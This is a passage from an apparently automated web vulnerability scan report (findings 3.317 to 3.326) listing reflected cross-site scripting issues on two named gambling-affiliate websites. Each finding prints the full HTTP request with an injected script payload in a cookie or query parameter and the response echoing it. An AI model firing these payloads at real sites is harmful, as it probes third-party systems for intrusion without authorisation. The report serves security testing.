Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM2e19c"-alert(1)-"c11a7558480; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2e19c"-alert(1)-"c11a7558480; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2e19c"-alert(1)-"c11a7558480";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.317. http://www.mundirasca.com/Terms.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3771c"-alert(1)-"f8899f6c3a8 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM3771c"-alert(1)-"f8899f6c3a8; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/
Set-Cookie: BO=FM3771c"-alert(1)-"f8899f6c3a8; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 104795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3771c"-alert(1)-"f8899f6c3a8";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.318. http://www.mundirasca.com/Terms.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2add4"-alert(1)-"97ee14f5f4 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM2add4"-alert(1)-"97ee14f5f4; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2add4"-alert(1)-"97ee14f5f4; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 104794


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2add4"-alert(1)-"97ee14f5f4";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.319. http://www.mundirasca.com/UnderAge.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 196b6"-alert(1)-"71ef61575b was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM196b6"-alert(1)-"71ef61575b; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: BO=FM196b6"-alert(1)-"71ef61575b; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM196b6"-alert(1)-"71ef61575b";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.320. http://www.mundirasca.com/UnderAge.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14e6a"-alert(1)-"acb11487409 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM14e6a"-alert(1)-"acb11487409; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM14e6a"-alert(1)-"acb11487409; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35571


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM14e6a"-alert(1)-"acb11487409";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.321. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /click/MundiRasca.com/SPA/Home/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fee2"-alert(1)-"f4c5b8a3f08 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click/MundiRasca.com/SPA/Home/ HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM2fee2"-alert(1)-"f4c5b8a3f08; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/
Set-Cookie: BO=FM2fee2"-alert(1)-"f4c5b8a3f08; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2fee2"-alert(1)-"f4c5b8a3f08";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.322. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /click/MundiRasca.com/SPA/Home/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 472cc"-alert(1)-"c4dae1c877d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click/MundiRasca.com/SPA/Home/ HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM472cc"-alert(1)-"c4dae1c877d; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM472cc"-alert(1)-"c4dae1c877d; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM472cc"-alert(1)-"c4dae1c877d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.323. https://www.neogamespartners.com/ [CMI parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neogamespartners.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8bcb</script><script>alert(1)</script>8f8d294f5a9 was submitted in the CMI parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?CMI=1c8bcb</script><script>alert(1)</script>8f8d294f5a9 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:47:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=1c8bcb</script><script>alert(1)</script>8f8d294f5a9

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
function(){
       $("#brands_hopa_more").show("slow");
   $("#brands_popular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?CMI=1c8bcb</script><script>alert(1)</script>8f8d294f5a9';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?CMI=1c8bcb</script>
...[SNIP]...

3.324. https://www.neogamespartners.com/ [CMI parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neogamespartners.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d290"><script>alert(1)</script>35779c113bd was submitted in the CMI parameter. This input was echoed as 7d290\"><script>alert(1)</script>35779c113bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?CMI=7d290"><script>alert(1)</script>35779c113bd HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:47:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=7d290\"><script>alert(1)</script>35779c113bd

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.neogamespartners.com/WebSite/Affiliates/login.aspx?CMI=7d290\"><script>alert(1)</script>35779c113bd" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.325. https://www.neogamespartners.com/ [CMI parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neogamespartners.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34a94"><script>alert(1)</script>b9311914110 was submitted in the CMI parameter. This input was echoed as 34a94\"><script>alert(1)</script>b9311914110 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?CMI=134a94"><script>alert(1)</script>b9311914110 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:47:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=134a94\"><script>alert(1)</script>b9311914110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=134a94\"><script>alert(1)</script>b9311914110" title="Home">
...[SNIP]...

3.326. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neogamespartners.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bb36"><script>alert(1)</script>3f495d41aad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8bb36\"><script>alert(1)</script>3f495d41aad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?CMI=1&8bb36"><script>alert(1)</script>3f495d41aad=1 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:47:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=1&8bb36\"><script>alert(1)</script>3f495d41aad=1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=1&8bb36\"><script>alert(1)</script>3f495d41aad=1" title="Home">
...[SNIP]...

